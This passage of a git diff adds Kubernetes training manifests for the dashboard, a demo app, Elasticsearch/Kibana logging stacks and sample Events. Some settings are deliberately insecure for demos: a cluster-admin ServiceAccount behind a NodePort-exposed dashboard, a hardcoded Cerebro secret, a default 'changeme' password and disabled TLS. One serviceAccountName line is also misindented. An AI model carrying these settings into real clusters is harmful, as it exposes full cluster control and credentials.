            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
            # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
    spec:
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.4
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
            - mountPath: /tmp
              name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

k8s/dashboard-with-token.yaml (new file, 336 lines)
@@ -0,0 +1,336 @@
# This file is based on the following manifest:
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml
# It adds a ServiceAccount that has cluster-admin privileges on the cluster,
# and exposes the dashboard on a NodePort. It makes it easier to do quick demos
# of the Kubernetes dashboard, without compromising the security too much.

# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  type: NodePort
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
  # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.0.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
            # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
    spec:
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.4
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
            - mountPath: /tmp
              name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
          serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: cluster-admin
  namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-cluster-admin
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: cluster-admin
|
||||
namespace: kubernetes-dashboard
|
||||
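The manifest above grants cluster-admin to a dedicated ServiceAccount; a possible way to fetch a login token for the dashboard is to read the token Secret that Kubernetes generates for that account (a sketch; the secret name suffix below is a placeholder generated by Kubernetes):

    kubectl --namespace=kubernetes-dashboard get secrets
    kubectl --namespace=kubernetes-dashboard describe secret cluster-admin-token-xxxxx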
160 k8s/dockercoins.yaml Normal file
@@ -0,0 +1,160 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hasher
  template:
    metadata:
      labels:
        app: hasher
    spec:
      containers:
      - image: dockercoins/hasher:v0.1
        name: hasher
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: hasher
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: redis
  name: redis
spec:
  replicas: 1
  selector:
    matchLabels:
      app: redis
  template:
    metadata:
      labels:
        app: redis
    spec:
      containers:
      - image: redis
        name: redis
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: redis
  name: redis
spec:
  ports:
  - port: 6379
    protocol: TCP
    targetPort: 6379
  selector:
    app: redis
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: rng
  name: rng
spec:
  replicas: 1
  selector:
    matchLabels:
      app: rng
  template:
    metadata:
      labels:
        app: rng
    spec:
      containers:
      - image: dockercoins/rng:v0.1
        name: rng
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: rng
  name: rng
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: rng
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: webui
  name: webui
spec:
  replicas: 1
  selector:
    matchLabels:
      app: webui
  template:
    metadata:
      labels:
        app: webui
    spec:
      containers:
      - image: dockercoins/webui:v0.1
        name: webui
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: webui
  name: webui
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: webui
  type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: worker
  name: worker
spec:
  replicas: 1
  selector:
    matchLabels:
      app: worker
  template:
    metadata:
      labels:
        app: worker
    spec:
      containers:
      - image: dockercoins/worker:v0.1
        name: worker
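A minimal way to deploy and inspect this five-component stack might be (a sketch, assuming a working cluster; webui is the only NodePort Service):

    kubectl apply -f k8s/dockercoins.yaml
    kubectl get deployments,services
    kubectl get service webui   # look up the allocated NodePort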
69 k8s/eck-cerebro.yaml Normal file
@@ -0,0 +1,69 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  selector:
    matchLabels:
      app: cerebro
  template:
    metadata:
      labels:
        app: cerebro
    spec:
      volumes:
      - name: conf
        configMap:
          name: cerebro
      containers:
      - image: lmenezes/cerebro
        name: cerebro
        volumeMounts:
        - name: conf
          mountPath: /conf
        args:
        - -Dconfig.file=/conf/application.conf
        env:
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic

---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  ports:
  - port: 9000
    protocol: TCP
    targetPort: 9000
  selector:
    app: cerebro
  type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: cerebro
data:
  application.conf: |
    secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"

    hosts = [
      {
        host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
        name = "demo"
        auth = {
          username = "elastic"
          password = ${?ELASTICSEARCH_PASSWORD}
        }
      }
    ]
19 k8s/eck-elasticsearch.yaml Normal file
@@ -0,0 +1,19 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
  name: demo
  namespace: eck-demo
spec:
  http:
    tls:
      selfSignedCertificate:
        disabled: true
  nodeSets:
  - name: default
    count: 1
    config:
      node.data: true
      node.ingest: true
      node.master: true
      node.store.allow_mmap: false
  version: 7.5.1
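This Elasticsearch custom resource only does something once the ECK operator is installed; a plausible way to apply it and watch the cluster come up (a sketch):

    kubectl apply -f k8s/eck-elasticsearch.yaml
    kubectl --namespace=eck-demo get elasticsearch demo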
168 k8s/eck-filebeat.yaml Normal file
@@ -0,0 +1,168 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: eck-demo
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.inputs:
    - type: container
      paths:
        - /var/log/containers/*.log
      processors:
        - add_kubernetes_metadata:
            host: ${NODE_NAME}
            matchers:
            - logs_path:
                logs_path: "/var/log/containers/"

    # To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      node: ${NODE_NAME}
    #      hints.enabled: true
    #      hints.default_config:
    #        type: container
    #        paths:
    #          - /var/log/containers/*${data.kubernetes.container.id}.log

    processors:
      - add_cloud_metadata:
      - add_host_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: eck-demo
  labels:
    k8s-app: filebeat
spec:
  selector:
    matchLabels:
      k8s-app: filebeat
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      hostNetwork: true
      dnsPolicy: ClusterFirstWithHostNet
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat:7.5.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: demo-es-http
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
        - name: varlog
          mountPath: /var/log
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: varlog
        hostPath:
          path: /var/log
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: eck-demo
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: eck-demo
  labels:
    k8s-app: filebeat
---
17 k8s/eck-kibana.yaml Normal file
@@ -0,0 +1,17 @@
apiVersion: kibana.k8s.elastic.co/v1
kind: Kibana
metadata:
  name: demo
spec:
  version: 7.5.1
  count: 1
  elasticsearchRef:
    name: demo
    namespace: eck-demo
  http:
    service:
      spec:
        type: NodePort
    tls:
      selfSignedCertificate:
        disabled: true
1802 k8s/eck-operator.yaml Normal file
File diff suppressed because it is too large
127 k8s/efk.yaml
@@ -3,9 +3,9 @@ apiVersion: v1
kind: ServiceAccount
metadata:
  name: fluentd

  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1beta1
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: fluentd
@@ -19,10 +19,9 @@ rules:
  - get
  - list
  - watch

---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: fluentd
roleRef:
@@ -33,23 +32,22 @@ subjects:
- kind: ServiceAccount
  name: fluentd
  namespace: default

---
apiVersion: extensions/v1beta1
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: fluentd
  namespace: default
  labels:
    k8s-app: fluentd-logging
    version: v1
    kubernetes.io/cluster-service: "true"
    app: fluentd
spec:
  selector:
    matchLabels:
      app: fluentd
  template:
    metadata:
      labels:
        k8s-app: fluentd-logging
        version: v1
        kubernetes.io/cluster-service: "true"
        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
@@ -58,7 +56,7 @@ spec:
        effect: NoSchedule
      containers:
      - name: fluentd
        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
        image: fluent/fluentd-kubernetes-daemonset:v1.4-debian-elasticsearch-1
        env:
          - name: FLUENT_ELASTICSEARCH_HOST
            value: "elasticsearch"
@@ -66,14 +64,12 @@ spec:
            value: "9200"
          - name: FLUENT_ELASTICSEARCH_SCHEME
            value: "http"
          # X-Pack Authentication
          # =====================
          - name: FLUENT_ELASTICSEARCH_USER
            value: "elastic"
          - name: FLUENT_ELASTICSEARCH_PASSWORD
            value: "changeme"
          - name: FLUENT_UID
            value: "0"
          - name: FLUENTD_SYSTEMD_CONF
            value: "disable"
          - name: FLUENTD_PROMETHEUS_CONF
            value: "disable"
        resources:
          limits:
            memory: 200Mi
@@ -94,134 +90,87 @@ spec:
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers

---
apiVersion: extensions/v1beta1
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: null
  generation: 1
  labels:
    run: elasticsearch
    app: elasticsearch
  name: elasticsearch
  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
  namespace: default
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      run: elasticsearch
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
      app: elasticsearch
  template:
    metadata:
      creationTimestamp: null
      labels:
        run: elasticsearch
        app: elasticsearch
    spec:
      containers:
      - image: elasticsearch:5.6.8
        imagePullPolicy: IfNotPresent
      - image: elasticsearch:5
        name: elasticsearch
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
        resources:
          limits:
            memory: 2Gi
          requests:
            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    run: elasticsearch
    app: elasticsearch
  name: elasticsearch
  selfLink: /api/v1/namespaces/default/services/elasticsearch
  namespace: default
spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
    run: elasticsearch
  sessionAffinity: None
    app: elasticsearch
  type: ClusterIP

---
apiVersion: extensions/v1beta1
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    deployment.kubernetes.io/revision: "1"
  creationTimestamp: null
  generation: 1
  labels:
    run: kibana
    app: kibana
  name: kibana
  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
  namespace: default
spec:
  progressDeadlineSeconds: 600
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      run: kibana
  strategy:
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 1
    type: RollingUpdate
      app: kibana
  template:
    metadata:
      creationTimestamp: null
      labels:
        run: kibana
        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
        image: kibana:5.6.8
        imagePullPolicy: Always
        image: kibana:5
        name: kibana
        resources: {}
        terminationMessagePath: /dev/termination-log
        terminationMessagePolicy: File
      dnsPolicy: ClusterFirst
      restartPolicy: Always
      schedulerName: default-scheduler
      securityContext: {}
      terminationGracePeriodSeconds: 30

---
apiVersion: v1
kind: Service
metadata:
  creationTimestamp: null
  labels:
    run: kibana
    app: kibana
  name: kibana
  selfLink: /api/v1/namespaces/default/services/kibana
  namespace: default
spec:
  externalTrafficPolicy: Cluster
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
    run: kibana
  sessionAffinity: None
    app: kibana
  type: NodePort

21 k8s/elasticsearch-cluster.yaml Normal file
@@ -0,0 +1,21 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"

97 k8s/elasticsearch-operator.yaml Normal file
@@ -0,0 +1,97 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  selector:
    matchLabels:
      name: elasticsearch-operator
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
30 k8s/event-node.yaml Normal file
@@ -0,0 +1,30 @@
kind: Event
apiVersion: v1
metadata:
  generateName: hello-
  labels:
    container.training/test: ""

#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42

involvedObject:
  kind: Node
  apiVersion: v1
  name: kind-control-plane
  # Note: the uid should be the Node name (not the uid of the Node).
  # This might be specific to global objects.
  uid: kind-control-plane

type: Warning
reason: NodeOverheat
message: "Node temperature exceeds critical threshold"
action: Hello
source:
  component: thermal-probe
  #host: node1
#reportingComponent: ""
#reportingInstance: ""

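Because this Event uses generateName, it has to go through kubectl create (apply requires a fixed name); the event should then appear when describing the node (a sketch, assuming a kind cluster with that node name):

    kubectl create -f k8s/event-node.yaml
    kubectl describe node kind-control-plane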
36 k8s/event-pod.yaml Normal file
@@ -0,0 +1,36 @@
kind: Event
apiVersion: v1
metadata:
  # One convention is to use <objectname>.<timestamp>,
  # where the timestamp is taken with a nanosecond
  # precision and expressed in hexadecimal.
  # Example: web-5dcb957ccc-fjvzc.164689730a36ec3d
  name: hello.1234567890
  # The label doesn't serve any purpose, except making
  # it easier to identify or delete that specific event.
  labels:
    container.training/test: ""

#eventTime: "2020-07-04T00:00:00.000000Z"
#firstTimestamp: "2020-01-01T00:00:00.000000Z"
#lastTimestamp: "2020-12-31T00:00:00.000000Z"
#count: 42

involvedObject:
  ### These 5 lines should be updated to refer to an object.
  ### Make sure to put the correct "uid", because it is what
  ### "kubectl describe" is using to gather relevant events.
  #apiVersion: v1
  #kind: Pod
  #name: magic-bean
  #namespace: blue
  #uid: 7f28fda8-6ef4-4580-8d87-b55721fcfc30

type: Normal
reason: BackupSuccessful
message: "Object successfully dumped to gitops repository"
source:
  component: gitops-sync
#reportingComponent: ""
#reportingInstance: ""

170 k8s/filebeat.yaml Normal file
@@ -0,0 +1,170 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
